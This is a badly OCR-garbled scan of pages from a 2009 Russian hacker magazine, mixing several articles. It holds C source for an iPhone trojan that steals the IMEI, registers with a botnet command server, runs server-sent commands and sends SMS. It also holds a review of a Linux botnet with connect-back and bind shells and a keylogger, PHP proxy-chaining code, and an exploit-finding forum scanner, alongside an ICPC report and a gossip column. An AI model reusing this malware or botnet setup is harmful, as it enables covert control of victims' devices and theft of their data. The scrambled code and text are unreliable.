errno,

strеrrог(ег,по));

exit(l);

c:har" getCCID ( ) {

int Ed; fd = IпitСОrJл(115200);

AT(fd) ;

SendCГI1d(fd,

ioccl(fd, TIOCEXCL);

О);

fC!ltl(fd, F_SETFL,

"AT+CCID\r" ,9);

char* res = ReadResp (fd)

C1oseConn (fd) ;

tcgecattr(ld, &terrn);

gOriginal TTYAttrs = terrn;

char* getIMEI{) (

cfrnakeraw(&term) ;

inc: fd;

c[setspeed(&term, speed);

term.

с_сПаg

=

I CLOCAL I CREAD;

С58

fd =

IпitСоnг,(1l5200);

AT(fd) ;

term.c_iflag =

О;

tеrm.с_оПа.g

=

О;

SепdСшд

term.c_1flag =

О;

ch<:>r* res = ReadPesp (f:d)

term.c_cc[\IМIN]

t егт. с_сс

[VТlМE]

=

О;

=

( fd, "AT+CGSN\ r" , 9) ;

Сl0sеСопп(fd)

О;

;

return res;

tcsetattr(fd, TC5ANO"I,

&tепп);

rеtЦПl Ео;

Ну вот, закончили cAT-командами.Теперь можнообъеди,нитьвсе 8месте в mаlnфУНКЦИИ,

После этого МОжнО писать вустройство:

void

SепdСmд(iпt [д,

voicl

*ЬцЕ,

size_t size)

РЕГИСТРАЦИЯТЕЛЕФОНА В БОТНЕТЕИПОЛУЧЕНИЕКОМАНДЫ Чтобы хозяин знал, что в его коллекции появилсяеще один зверек, зара­

жен ному надо зарегистрироваться,С точки зрения трояна - это просто

i.i ('Nrite(ld, :')uf, size) == -1}

еще один http-заГ1РОс. В качестве пара метра передает IMEI телефона и

fprinl:.f (stderr, "SendCmd error.

%Б\П",

trerror !err!lo) ) ;

-

int getVKey (char*

A'r+CMGD=l !!

удаляем "се СМС из о'{ереди. "1Тобы наше сообще­

ние стало первым

AT+CMGF= 1 / /

переводим иодеи в текс:т()вPtЙ режим

AT+CMGW=79000000000 1/

номер П"ЛУЧС1теля

Набираем сано соо6шение

AT+C!-1SS=l 11

~

IMEI, В

)

Для отправки СМС используется такая последовательность команд:

1./

это специальная функция. вычисленная от

реализация на С:

}

)

проверочный код, Код

прошлой статье я приводил ее исходник на РНР на стороне сервера, А вот

exit(l);

066

отправляеи наше сообщение

iшеi)

if (strlen(imei) !=15) return -1;

int 'fkey = О;

int i = Oj

= О;

int

с

;'пt.

1 =

О;

iпtш=О;

char *1< = (char ") malloc (1) ;

for (i=O; i<5; i++) (

XAIKEP 06

/Н6/

09

РЕЗУЛЬТАТ ВЫПОЛНЕНИЯ НАЗАРАЖЕННОМ ТЕЛЕ­ ФоНЕ еКРИПТА #DATE; UNAME-A s\..-itch (i) {

саве О: с

ве

са:;,"

else j f (strstr

1 = 3; т = 101; break;

1: 1. = 7; m = 107; bJ.:eak;

if

(СОЮ~D. rt,

str1en(CO~дND.r2»O)

2: 1. " 8; т = 3; break;

"И5")!

=NULl,)

(5t.rJ.еn(СОИМАND.гl»N!,LLи,

С]1ат

(

*LlrJ.J:es[1024J;

cas," 3; 1 = 11;

гt1

= 9; break;

sprintf(ur1res, "%В%5", СОЮ~D.г2,rеs);

саве

lil

= 71; break;

sendHt.tpReql,est

4; 1 = 13;

(СОММ)ШD. [-1,

urlres) ;

fr-ee(urlres) ; тетеру (k, с

~

dvd



Рабочую версию ис­

XOAHvi1(OB ты

&imei [1], 1);

= atoi (k) ;

~а~lДешь

на диске.

v'keY+=C*ffii

• i f (strJ.еп(СОЮ~D.р1»0)( system(COt~~O.p1)

intl'egzombie(char-* imej) (

Новую версию

сервера для ботнета

else if (st.rst.г·(СОММАND_СL, "sh") !=NULLI (

тоже ищи на диске

;

char-* regur-1.[1024];

sprintf(regur1,"/master-server/reg.

php?imei=%s&vkey=%d"

,imei,

getVKey(imei));

eJ.se i f (strstr (COММANO.се , "tg") !=-NПЫ.. ) (

if

send}ittpRequest (" 192.168.10.1" ,regU!:1) ;

(str1en{СОЮ1AND_рJ.)>0)

(

timeout=atoi (СОЮ1АND.рJ.) i

r-еtJrп О;

MAIN() - ВСЕМУ ГОЛОВА

return

О;

~

Осталось самая малость - написать главную функцию. Здесь м ы будем в цикле принимать и обрабатывать при шедшие

links

bJ..tJ2:Uохоd.гu - мой

int mаiп(iпt argc, сЬа!" **argv)

команды от сервера и, в зависимости от команд, выполнять те

regzombie(getIMEI{)};

блог. Пишупо мере

или и н ые действия. Мен ьше слов, больше кода:

иhilе (1.)

желания. Жду ком­

i n t доСmд ( s с. ruct СОИИAND COММAND) { iE (strstr (СОИИАND. ct, "!От")! =NULL)

COММANO

(

sleep(timeout)

(stгlел(СОММAND.р11 > О)

if if

(strst[·(СОММJl,ND.р2,

доСmд (COММANO)

СОЮ!AND

{

"getIHEI") !=NULL)

sепdSМS(СО~ЛD.р1,gеtIМЕI()) ;

}

ментариеВ,отвечу

i

= takeCmd ( Т ) ;

на 80ПрОСЫ_

;

= takeCmd(O);

doCmd ( СОЮ1АND) ;

}

}

е1.ве

if (str1en

.1.1 !'IOMep /I

(СОММAJ'Ш.р1)==1)

по УМОl1чг.:Н-iИJC

J

использовался П1.JИ

записи видео-ролика дr1Я Х

sendSMS (" 89100000000" ,COMHA..1I1D.p2) ;

Ну что, все оченьпросто и открыто. Самый главный хаквзтомтро­ яне - написанная правильными ребятами утилита

ldid. Она поз­

80ляетподписать скомпилен I~ЫЙ бинарник, чтобы он запускался

}

нателефоне Процецура эта уникальна для каждого аппарата. Тут

~

eise (

возникает необходимость копироватьэ1)'УТИЛИ1)' на зараженный

8НИ'1ание! Инфор­

телефон, если она не была установлена самим владельцем вмес­

мация представлена

те с каким-нибудь па кетом. Ноэто уже дело техники внедрения.

исключительно

Можетбыть, я еще напишуобэтом в следующей статье.

с целью ознакомле­

sendSMS(CO~\NO

p1,co~ft~D.p2);

} )

/

}

warni'ng

НИRI Ниавтор,

ЗАКЛЮЧЕНИЕ

ни редакция за твои

Все когда-то кончается. Вкусное пиво иссякает, интересные

деЙСТВИR ответствен­

сЬат *тев[1024];

идеи безнадежно устаревают, мечты материализуЮТСR или

ности не Hecyтl

sprintf (res, "%в" ,gеtСАLL{СШ1МAND.р1));

уходят сами собой, а про деньги

i f (stгsU-{СОМИANО.гt, "зm") !=NUl,TJ)

шел к концу цикл статей по Арр[е iPhone. Где-то было скучно,

eJse .~f (strstr(СОМИАND,сt, "at") !=NULL)

i f (stг1.еп(СОЮ1AND.р1.) > О)

i f (stгlеп(СО~ЫD.rl»О)

sendSMS }

}

ХАКЕР

06 1126/ 09

(СОММАND.г1,тев)

;

Rдаже

не говорю. 80Т и подо­

где-то непонятно, ЧТО-ТО я упустил, что-то недосмотрел

-

без

этого никуда. Надеюсь, тебе была полезна эта и прошлыеста­ тьи цикла Как всегда, на все Bonpocbl отеечаю в блоге охоd.ГU Х

-

b.ШdL

I

ПРОГ АММЫ для ХАКЕР._О_В_ _

1I1

- ­.... ПРQГРАММА:ХВАRV. 11.2.0

файл со списком доменов После получения

IШI*NIХ/'w'IN

результатов можно отпарсить список доменов

M#Ji!J:lV01 D

поданным РR/ТИЦ. Теперь рассмотримфункцию поиска МD5­

IНost

IIP

9:2HPSl4Z­

!PR

I

170))

~

"-'':Df'U

!ТVЦ

~ ~

хэшей. С ней можно отправлять хэши на

WW'N.mll'.'-'ОГП1.СОПlи 'Nwv<.hаshсгасkiпg.iпfо, причем, количествохэшейне ограничено.

...

~ ~

АI1ГОРИТМ твоих действий прост:

ЧУДО-ПЛАГИНДЛЯ FF

1.

Ij~~~~~~ Не знаю, какой из браузеровты юзаешь, но я в

В разделе аппий плагина I

вкладке

кта

«General"

повседнев,IOЙработе привык доверять Flrefox.

2.

прими сертификат безопаснос'!'и

It~§';mШI нообразных пЛагинов на все случаи жизни.l. Именно поэтому хочу представить тебе незаме­

нимый плагинХЬаГV.1.2 О

ботнет

«Disable - Search frorn file»

Одна иэ причин

- огромное количество раз-

LINUХ-БОТНЕТ

li:a

сними rалку с ПУН­

Зайди на WvM

.hashcracking, info

и

Кхм, О чем это я 7 Какты догадался, под

эагадоч'lЫМ определением «система удаленного

администрирования» скрывается масса полез­

3.

Еыбери файлик с хэшаМТ-1 И ЖМИ 6а"Го.н

ных софтин, помогающихуправлять множеством

4.

Опени результат Е окне бра-узера

своих [и не совсем своих, а порой и совсем не

своих! компов. Сейчас я хочу представить именно

oTV01 d'a, созданный

для поиска МD5-хэшей, определения РR(ТИЦ

Пора подводитьитоги функциональности.

такую тулзу - «НуЬпd

сайтов и обладающий функцией ReverselP.

Плагин позволяет·

System» OTCSrSS. СофтпреД'lазначенисключи­

Для начала инсталлируем дополнение к

I

1-'---'-'-

1.

Сдиваем пла.ГИН с нашего

2.

Запускаем

DVD

(F i 1 е - >

File -> xBar,xpiJ

включает в себя:



Получать РR/ТИЦ ресурса



Работать СО списком ДО1-1енов ИЗ

1.

Бот



2.

Клиентская консоль

СОРТИРОЕать список саЙТОЕ Е соо'г­

ReverseIP

Ждем завершения устаНОЕКИ

ПРОИЗDОДИТЬ

5.

Ре бутим браузер

Отправлять МDS-хэш иа анализ прямо

Отправлять на анализ сразу не­

нижнем углу будет дополнительная менюшка,

сколько ИD5-хзшей из файла

состоящая из двух пунктов'

удобно)



файла

2,

..

и снимаем галочку с опции "Hide»

• Connect Back shell (not -

коннектбэк-шелл.

-

одновременно

по

',;vгw. шiJ.wОrrn. сот и

w.vw.hashcracking.info

епсrурtеd)

Шифрование со­

единения отсутствует

• Bind shell, port:

Искать МD5-хэm.и

двум ресурсам

ПО порядку, Кликаем по батону "SEO"

(очень

Парсить МD5-хэши при загрузке из

1. SEO

1 - ­ Начнем

BlackEnergy (PHP/MySQL)

Бот обладает неплохим функционалом.

из браузера



- Perl: : Gtk2

З. НТ1'Р-админка на базе админ-панели от

4.

rШ5

- Perl

файла

веТСТЕИИ с результатами по РR/ТИЦ

Теперь при каждом запуске брауэера в правом

Remote Ad mlПlstratюп

тельно для использования на Llпuх-платформеи

Firefox:

Fir'efox

З. ОТКрЫЕаем файл плагина ореп

--_._-­

.

encrypted) -

бббб

бинд-шелл,

в виде отдельной утилы,

(not Реализоnан упраЕляе­

ной ботом; шифРОЕание соединения

- появится

отсутствует

попедля ввода названиядомена,по которо­

Короче говоря, в срочном порядке ставим пла­

• Connect Back Encrypted keylogger

мумы получим РR/ТИЦ, а также ReverselP

r'lH и дружно благодаримV01

-

Вбиваем домен и жме~~

релиз l

секунд перед нами -

"Enter». Через пару

клике'н-а';начке «+» рядом С IР-адресом серве­ ра активируется функция

ReverselP. Она позво­

ляет просмотреть список сайтов, хостящихся на

~~~~l сервере. Но это еще не все, ибо есть возмож­ ность получить данные сразу по нескольким

I!:'~~~~§ доменам. Для этого заходим в раздел опций пункта
~

068

очередной

подробный отчет со всеми

необходи м,ыми да н н ым и. При допол н ительном

плагина, на вкладке

d'a за

«General" снимаем галку С

- Search [гот file" и выбираем

кеЙлоггер.

клавиш,

rot4 7&RC4

por~~t'1t1~;HYBRID REMOTE

}1ени

Записывает нажатие

кодирует их алгоритмами

и в режиме реального

отсылает

на удаленную

вре­

машину

ADMINISTRATION SYSTEM _LINUX

дит при ПОМОЩИ клиентской КОНСОЛИ

M3i!JlcSRSS

• Encrypted Rernote Terminal

В прошлых выпускахХ-Тулз Я неоднократно вы­

(Е.

.

Обработка логов кейлоггера происхо­

R. Т,

Е)

-

аналог

SSH,

кладывал различные системы удаленного адми­

которого бот устанавливает

нистрирования под Винду, В этот раз я порадую

ние с удаленной

тебя продуктом под совершенно другую платфор­

КОДИРУI:JТСЯ

му - Линух, Да-да, и на Liп ux' е можно поднять

ся клиентская консоль.

l:-fашиноЙ.

(rot47&RC4),

Еп'.Ulаtоr

при помощи

соедине­

Все данные

использует­

ХА'КЕР

06/116/09

»

в::лоМ

''''---.--t------------------.---Приступим к конфигурированию системы управ­

exit i

ления Начнем. как водится, с бота. Открываем

сорец бота и редактируем следующие строки:

?> и попробуем построитьцепочкупроксиков:

n1у

$homeserver = ''http://localhost/ public/getcmd,php"; # ПОЛУ'~ение ботО!~ команд

1.

ту

ных удаленных сервера. например:

#

$defaulLSleepTime = 10;

та'Ймаут,

"Е спучае отсутствия НОВЫХ

СОБСТВЕННЫЙ ПРОКСИК

Заливаен рруоху ,php на два раз­

http://site1.com/proxY/pproxY.php

все СЛОЖf1ее. Порой прокси может понадобить­

2.

в сорце консоли бота вносим изменения в

ея в самый неподходящиймомент... так какже

следующииипараметраии:

параметры:

быть? Выход один

per1 ploca1.pl

-

иметь под рукой собствен­

ный проксик. готовый В любую минУ1У обслужить

гс хост.

на котором находится

QбходИМО ДЛЯ Е.

ту

R.

E.R,T.E

&

$MAXLEN

ту

$LISTEN_PORT

ШУ

(не­

пасс

(неооходи­

Keylogger)

= 1024;

ту

порт,

601'

Т. Е)

$pa.ss = "1"; # RC4

ио дЛЯ

#

тебя

$.server_host = "127. О, 0,1" ;

ту

и

http://site2.com/proxy/pproxy.php

команд

Причем, проще всего будет поднять не

-рх

proxy/pproxy,php

http://sitel.com/

реу1

pJ.ocal.pl

-рх

http://site2.com/proxy/pproxy.php

Воuпсегили 3ргоху, а Рргоху, о котором я тебе

-срх

сейчас расскажу. Тулза представляетеобой РН Р­

З. Пускаем браузер аа порт

проксик, СОСТОАЩИЙ из двух частей -удаленноЙ

4,

Iрргоху php! и локальной (plocal.plJ. На локалхос·

-> site1.com -> site2.com -> target

http://localhost: 8008

Схема цепочки такова:

-Ьр

8009

8009

localhost

те заnускаеТСА перловаА часть, прослушиваю­

=

66б;

на который бот шлет данные

$SEND_PORT

J

Запyrскаем покальный скрипт со

= 555;

#

порт.

;;0'1'0-

рый БQТ будет ПРQСЛУШИВдТЬ

щая порт, на который liатравл и ваетея браузер.

Аналогичны м образом можно составлятьи более

а с<:м РНР-прокси заливаеТСА на какой-нибудь

длинные цепочки. Однако не забывай про логи

сервер.

web-сервера.В них можно будеттебя отыскать.

Использовать Рргоху довольно просто:

ПРО[Е' Модифицируемhttр-админкунабазеадминкиот

1.

BlackEnergy'

удалеnный сервер. например.

СrrачаJ1а запиваем PP~'OKY . php на

tlt tp: / /

t'1ty 1A; FORIJt'1 DETECTOR

rmI·*NIX7..;JiN r;oШI!Ji.DХ

site.com/proxy/pproxy.php $prot

= О;

используем логин ИЛИ

/I

- r"P,.LSE, 1. - "rR()E

2.

Затем запускаем локальный скрипт:

$пате='сfсd208495d5БSеfБбе7dff9f98

pet'l plocal.pl -рк http://site.com/ proxy/pproxy.php

7б4dа';

З. После этого по дефолту открывает­

нет?

О

usеП'!сJmе, (О)

// md5.

$раss='сfсd208495d5б5еfббе7dff9f98

СЯ порт

7б4dа'; //тd5.

ет пускать 6раузер

passwo!:"d

(О}

8008,

через который и следу­

Сорец pproxy.php очень компактен и может быть заПРОСТQдобавлеf1В тело ко f1T€нтэ саЙта.



imeout =

БОО;

/

/зреИ5i нахож­

дения бота в БдJ поспе истечения

ука:занного времени бот автоматически удаляеТС~f,

//$зессес

=

i f (isset ($_POST [ 'query' ]) isset($_POST['host']) )

Роус]

локаль­

ный порт. на который бот будет слать

поис(е сплойтов под различные форумные

POST [ 'secret'] ! = $secret)) exi t;

[L.Host] - Loca1 Host [Кеу]

$query

~

- RC4

наш :еР-адрес

удаленный

порт, который прослушивает бот

в общем, поюзай самостоятельно. Только не

Из возможностейскриnта следует отметить:

Ьаsеб4_dесоdе(str_rерlасе("

"+"

if(!$port)$por-t =

-._----ПРОГРДМt'1Д;

PPROXY

Определение типа форума

вание

• •

$ip = gethostbynamel$host); if (!>fp = @f.sockopen ($ip, $Рой. $еп·str.



(расrrозна­

IPB. phpBB. vBulletin.

МуВВ)

Определение версии движка форума

по разным критериян

ВО;

20))

Определение ВО31'10ЖНЫХ уязвиностей

движка Форуиа и поиск поцходящих для них сплойтов



забывай, Ч1Оты уже взрослый и за все свои действия ответственность несешь сам

МуВВ

base64_decode (str_

t·epJ.acel" ". "+". $_POST[ 'quet·y']));

$etTnO.

- IP8, phpBB, v8ulletin,

последних версий.

$_POST['host']))) ;

пароль

[R. Port] - Remote P-ort -

ваетнеСКОЛЬКQ самых извеСТf1ых форумов,

среди которых

list ($hOSl, $port) = explode (' : '.

данные

пред­

движки. На данный моменттулза поддержи­

&& ($_

@set_tirne_1irnit(0);

команда

- Local Port -

Forum Detector. Утила

указаНf10ГО форума, что особеf1НО полезно при

appl~cation/octet-stream');

[E.R.T.I::.] -

ОПРЕДЕЛЯЕМДВИЖОКФОРУМА

назначена для определениятипа и версии

&&

hеаdеr('Сопtепt-tуре:

[L.

~-.J

л"",",,, ~_Io.(_.lIItо~",_I-_--..J_~--J

релизотdх -

'рруохуразз';

if(isset($secret) ПОЛА:

OIIt"!IlI"obaI1.SoduS Ц>еО'

Напоследокпредставлютебе очередной


Р.спи не дал о себе знать

в админке ты можешь f1аблюдать следующие

вrti>-_.

,ф<~I)"",."oIo_ _ ,..,.c;q»''''1"~.nP",<JO/Wo.6.8,,,,,,,,,,un..IA_''''_ВoWd.~

$pass = ""; / /MySQL user pass·.vord

"ar'

...... п т..д Ф не мс~~еш. r.;:.щ •• ...п.~

oa<..__.....

~ .. rng_яo:r"1>J>GQ~"'1"I!n"1)~ИIQmМ)"О'ЦUl.Q",~f;y,lIЩ
$host = "10calhost"; / / MySQL-хос'I' $user = "root"; /.1 ~1ySQL user $db = "stats"; / /Н8.звание БД $table = "bots"; / /название ",аБЛИЧК!1

..

'ZI(lщ><.<:u

Определение ТиЦ и

PR

саЙта.

нд. ко­

тором установлен форум

fwrite($fp. $query); иhiJ.е (!



feof ($fp) )

ей/sосks5 с авториsацией

{

B*NIXI\oIIN

$answer = fread($fp,

r;.1#1(1]#lBONSI

Наличие поддержки работы через

прокси/sосks5/прокси с авторизаци­

echo $ans

l€::r.;

T....

,О24);

Конечно, утила сплойтза тебя не эапустити

Потребность в проксиJcоксах 80Зн и кает посто­

}

веб-шелл

янно. Гlроблема в том, что найти стабильный и

fclose ($fp) ;

протестировать пароч ку-другую интересных

качеетвеf1f1ЫЙ сервис с каждым днем становится

ХАКЕР

06 11261 09

форумов

-

f1a сервер

не зальет Но еслиты решил

тулза в этом поможет.::JC

>> сцен.:.

OFTHEBRA ОТЧЕТ С ФИНАЛААСМ

21

апреля

2009

ICPC 2009

года три сотни лучших молодых математиков и программистов

собрались в Стокгольме для участия в финале Чемпионата мира по спортивно­ му программированию АСIV11СРС, главным спонсором I<ОТОрОГО выступает IВМ. По приглашению этой замечательной I<омпании я и отправился в Швецию,

чтобы своими глазами увидеть битву лучших молодыхумов планеты.

«Для решения серьезных проблем нужны

Любая проблема здесь, как бы она ни была

Также намечалось интересное российско-ки­

величайшие. уверенные в своих способнос­

подана, всегда уп ирается В соста вление

тайское противостояние от Китая традицион­

тях умы, способные предложить нестандарт­

математических моделей и решение мате­

но приехало немало сильных команд, готовых

ные решения.

матических задач. Решений «на пальцах" не

бороться за самые высокие места

-

считает доктор Билл Паучер

[Blll Poucheri, профессорУниверситета

бывает даже если задачку и можно решить

Бзйлор [Baylor UПlvеГSllуJ и исполнительный

тупым перебором. такое решение не пройдет

директор чемпионата ICPC

по ограничениям

-

Их можно

на ресурсы

-

для каждого

Непосредственно фи нальные соревнования

назвать атлетами ИН,lOваций Они выходят за

задания существуют пороговые значен И51 по

проходили В КТН

рамки ограничений и получаютудовольствие,

используемой памяти и времени выполнения.

ческом университете Стокгольма. И ровно в

утра

делая эту работу». Что говорить. спортивное прОI-раммирование

Участники

-

Королевском технологи­

9

21 апреля был дан старт соревнованиям

В этом году участникам было предложено

8

штука очень специфичная, стоящая особ­

в зтом году представлять Россию поехали

няком от того, что большинство людей вообще

команд ИТМО Iчемпионы прошлого годаl.

оказалась задачка с индексом «А»: ее

привыкли понимать под программированием.

Саратовский ГУ [чемпионы России этого

решили очень быстро и для большинства

Задачи. которые ставятся на соревнованиях

года], МГУ, Алтайский ГУ. Новосибирский ГУ.

команд именно она была первой решенной

по спортивному программированию. несут

СПБ ГУ, Уральский и Южно-Уральский ГУ. Так­

задаче~i.

в себе. главныt-:1-0.бразом. математические

же среди участников были такие известные

За

5 часов соревнований было решено 9 из

и алгоритмические вопросы СПОРТИ8ное

вузы как М1Т. Стзнфорд, Оксфорд, Варшав­

11

зада ч: зто см огл и сделать две команды

-

1,

Соревнования и итоги

11

задач, наиболее простой из которых

программирование предъявляет к участникам

ский Университет, Университет Карнеги­

- ИТМО и Университет Цинхуа Победите­

соревнований высочайшие требования в

Меллона и Циньхуа Предматчевые расклады

ля определили по затраченному времени:

области математической подготовки, команд­

были простые: команда ИТМО приехала

показав результат в

ной работы и навыков быстрого и чистого

отстаивать статус Чемпионов мира. а все

подряд ЧемпионамVI мира стали ребята из

программи рования

остальные приехали мешать им это сделать:J.

ИТМО!

~

070

1381

минут второй раз

ХАКЕР

06 /126/ 09

~

071

»

сцена

~

links



jroc.bavlOГ.edlJ

официальный сайт чемпионата. Тут ты можешь поо~отреть

фото и видео-архив. скачать задания с предыдущих сорев­

нований и получить

любую другую инфор­ мацию о чемпионате.

• WWW.5пагkпеW5.ir1fо -

новости российс­

КИХ и международ­ ных чемпионаТО8 по программ ированию.

• w\Nw.loQcoder·.com -

сайт "сольного»

соревнования для

програММИСТО8.



WWW.орепсuр.ГU

­

открытый чемпионат

МГУ по программиро­ ванию.

• gQQgle.coIТl! cocJejam - чемпио­ нат codeJдm. который про водит

google.

• асm.timus.ГU - сай, УРГУ. посвящен­

ный олимпиадам по программированию.

Тут размещен выдающийся архив задач и проееряюшая

система.

€)

~

dvd

На нашемдискеты найдешь задачи зто го года. а та кже

подборку фотографий

с финала ДСМ ICPC 2009 в Сто кгол же.

ХАКЕР

06 /1261 09

ФИНАЛЬНЫЕ РЕЗУЛЬТАТЫ

НА3ВАКИЕ ВУЗА

РЕШЕНО

ВРЕМЯ

УНИВЕРСИТЕТ ИТ, МЕХАНИКИ И

9

1381

T51NGHUA UNIVER51TY

9

1800

САНКТ-ПЕТЕРБУРГСКИЙ ГУ

8

1176

САРАТОВСКИЙ ГУ

8

1305

UNIVER5IТY

7

998

7

1117

17

1143

АЛТАЙСКИЙ ГУ

7

125"

UNIVER51TY OF WAR5AW

7

1"13

UN 'УЕ R51 ТУ OF WATERLOO

6

787

1. JAVAKHI5HVILI TBI LI51 5ТАТЕ UNIVER51TY

6

933

CARNEGIE MELLON UNIVER51TY

6

10"5

ОПТИКИ IСАНКТ-ПЕТЕРБУРГ)

OF OXFORD

ZHEJIANG UNIVER51TY MA55ACHU5EH5 IN5TITUTE OF TECHNOLOGY

ХАКЕР

06/126/ 09

~

073

--------

• о

о

~

»

О

1",

;:J

о

~

1.



q-

7

lJ

Д

7777 О

[J

сч.г+F

О

О

О

О

ъ,

tf-Jll: (Ь ~eJ J1l::::P9::::J-l'-tJ1ltu

t:?~7~?rR,гR

о

u

о

о

о

о

о

о

о

о

о

о

[l

г

о

о

о

о

о

о

о

о

о

о

о

с::

сч'.-V

Lt.

еР

ъ'гrfJ

о

о

о

l

О

qh--& СЧ,гrP 9::;,,+1-1 t

l-=~ ~ Itp 9::::J-l4=РCJ-jl СЬР r:ЬJ l-::r 9::::J-lLtP yJ ~::Fч:::JJl[y 9::::J-lЧ-гqd-,

cF

_С1+д

о

СЧ,д'

t:I~ct:7~7~[~~?[~?~·I:'~~J~? о

(1

по

[Jf]

О

П

О

О

О

r'

О

О

о

о

I

о

[J

О

'~q~G~,~g}G[l~tp~

~7tJ(,е7~7гН"p,~~ u

о

о

о

о

о

о

о

о

о

...

ЧТО е !:IчИ екрисом?

. . . оеЬ

Вся правда о настоящем и будущем Криса iКасперски Почтовый сервер редакцииIуже несколько месяцев трещит под натиском писем с темой «Крис Касперски». Читателей мучают вопросы: «Что случилось

С мыщъх'ом?»,«Будетли он снова писать статьи?». Сначала мы отвечали, что те пятьдесяткустов дурмана, которые росли у него на делянке, погубил ураган, и прихода больше нет Затем -

что его, с зеркал кой и китайским паспортом,

приняли спецслужбы на территории американского посольства в Сеуле.

1.

вступ ИТЕЛ ЬНОЕ СЛОВО РЕДАКЦИИ

[компания Епdеаvог Security. куда первона­

-

чально устроился мыщьх, теперь является

Алиса,

Нет,

у иеня есть кошка

-

I

-

сказала

Ее зовут.

Сейчас мы откроем страшную тайну; что

частью этой корпорацииl.

-

же, на самом деле, случилось, .. Вынуждены

о ездите докладами по хакерским конферен­

-- ДаЕНО пора 'гебе рассказать нан о

признаться, после одной из редколлегий

циям;

себе и о СВОих приключениях.'

нам пришлось усыпить Криса

Ic помощью

о ведет с различными издательствами пере­

Прекрасно!

-

обрадовался грифон.

Льюис Кзрролл. «Алиса в Стране чудес»

двух сексапильных близняшек, подогнанных

ГО80РЫ по переводу и изданию своих книгза

Андрюшкомl и отдать на опыты в лабораторию

рубежом;

~

экспериментальной медицины, чтобы выпла·



судится с посольством Южной Афри ки;

ность повествовагlИЯ,ЭТИ строки пишутся из

титьдолг перед финской типографией (факен



егохвостсворачивается в ИВрИI. поскольку в

далекой и загадочной Малайзии -

'~

кризис l ]

Израиле у Криса тоже ки п ят мажорны е дела

.~

It's ajoke, амиго, не волнуЙся:l. В действитель­

Какты понимаешь, все это отнимает невероя,'·

пляжей и восточного колорита, Мысли скачут

ности. Крис крутится по всему периметрутак.

ное количество времени и сил, НО он планирует

сайгаками по колдобинам, от избытка впе·

ЧТО ды М из ушей идет:

вновь писать в:н:. и ВОТ тому подтверждение,

,~

<

('

~

• работаеl' независимым консультантом в

~

подразделении

~

занимаются разработкой НIРS/IРS-систем

~

~

"" ~

1

Да простятмнечитатели некоторую сумбур­

~

074

McAFee,

сотрудники которого

страны

самобытной экзотики, роскошных песчаных

чатлений ТОПОРЩИТС\1 шерсть, и хвост встает

Аыбом, потому как потрясающе красивых

-

у тебя есть свой конек?!

ДеПИ1сатес,

--

спросил

девушек здесь больше, чем буддистских

монахов, предлагающих проголосовать за

ХАКЕР

06 11261 09

....

I

ML1P,

.... , /

(:цен.:.

ПрL1чем ОДИН голос стоит не меньше

сотн" рентген, а то и двести. На наши деньг"

-7500

рублей. Дорогой мир, однако

ЛЕНИВЫЕМАЛАЙЦЫ Большой неОЖL1данностьюОl(азалсяДЛЯ меня ужасаlОЩИЙхолод, вынуждающийтаскатьс собой

свщер, И ЭТО ПрL135 градусах по Цельсию! Ну, в

А все почему? Преступлений ЧТОЛL1 меньше?

мы, значит, в чулане у раджи, прямо на обо­

TeHL135, а во всех остальных местах понатыканы

Так ведь ни xBocTa l Карманы L1 барсетки

чине свальной борозды, долБL1М этот«поtа dгug» L1 rOBOpL1M за все дела KcтaTL1, "ндусы

КОНДИЦL10неры, рабстаЮЩL1е на полную мощность.

режут прямо в центральных аэропортах. Бай­

Только L1 ищешь, где бы согреться И еще ищешь,

керы срывают сумк" на ходу, Гопы сначала

к малайкам абсолютно параллельны. Они на

чего бы эаТОЧL1ТЬ. Малайская еда вкусная, дешевая

бьют по голове, а уже потом смотрят, что ы

них насмотрелись, "м латинок подавай.

lяблочны й сокдороже обедаl, но совершенно не

карманах у жертвы. Криминальная r-роника в

в ОТЕЛЕ, НА ТОПЧАНЕ

КЗЛОРL1йная, а потому быстро переваривающаяся

газетах -

Девушки здесь цвета радуги - яркие одежды,

зачем только я ее читал перед тем, как сюда

Сами малайцы только о русских девушках и говорят, хотя МНОГL1е их никогда "е видели. Оно,

вообще кошмар на улице Вязов И

пестрые ;<раски. П ра ктически все читают Коран

поехать? I Первы~ ден ь провел на KOHKpeTHO~1

L1 ходятв платках, L1 сам" малайцы жалуются на

L1змене, ОЖL1дая подвоха, но потом махнул

конечно, понятно. РУССКL1едля HL1X -

то, что под юбку к ним так просто не полазишь Ну,

хвостом. В МНОГОМL1ЛЛИОННОЙ Куала~Лумг>ур,

а самые красивые

экзотика,

- это еврейки, причем с ав­

насчет «не полаЗL1ШЬ» они слегка ПОГОРЯЧL1ЛИСЬ.

конечно же, не обходится без преступлениЙ.

томатом_ Девушка С оружие'м в руках выглядит

ЭТООНL1 сравнивают малаек с американками,

Вот только никто не делает L1з этого трагедии

сексуально, особенно если она только после

которых видели только по телевизору и о которых

мирового масштаба L1 не живет В посто­

армии (в ИзраL1ле все деВУШКL1 служат) и со

товаРL1ЩИ. побывавшие в AMepL1Ke, рассказывают

янном страхе, что сейчас ограбят, убьют,

СПОРНIВНОЙ подготовкой У нее все в порядке

вся кие бай KL1, как эападные женщины готовы лечь

изнасилуют и даже "мен" не спросят. Не, на

Гуляешь с такой по ночному городу и чувству­

под первого встречного, Малайцы слиш ком ле­

самом деле меня тут едва не изнасиловаЛL1,

ешь себя в полной безопасности.

нивые, чтобы ухаживать, Адевушки тут .. TaKL1e же,

И руку на грудь клали, и за хвост хватали, и

Еврейки мыщьху настолько понраВИЛL1СЬ, что

каки везде. особенно еслиучесть, что малайцев В

только когда она поняла, что ей с подругой

он даже HI~ с кем не переспал И ка к это я так

Малайзии нетакуж и MHoro. TYPL1CTOB - куда боль­

ничего не обломится, натуральным обра­

отличился, не понимаю

ше. Китаянки, японки .. , ПРL1веТЛL1вые, открытые и

30М выстаВL1ла за дверь А дверь эта была

связано с сильной усталостью Я же сюда не на

оБЩlЛельные. AMepL1KaHCKL1e девушки также легко

в деревне. И такси там по~мать нереально.

отдых приехал, а на работу. К вечеру настолько

идут на контакт. осооенно в местах вынужденного

Общественный транспорт ходит по непонят­

выматываюсь, что сил хватаеттолько на то, чтобы

заключения, типа аэропортов и прочих домов

ным траекториям. Благо, хоть ТWlп-Тоwегs

посидеть с коллегаМL1в ресторане, после чего

терп и!"юсти Легкость, с которой он и переходят на

(небоскребы «Башни Близнецы Петронас»1

вернуться В отел ь и завалиться на топ ча н. Нату­

обсуждениеличных проблем, просто поражает,

были видны, и мыщъх, как дурак, шел по

ральный такой топчан. На который и девушку-то

но

азимуту четыре часа, пока не добрался до

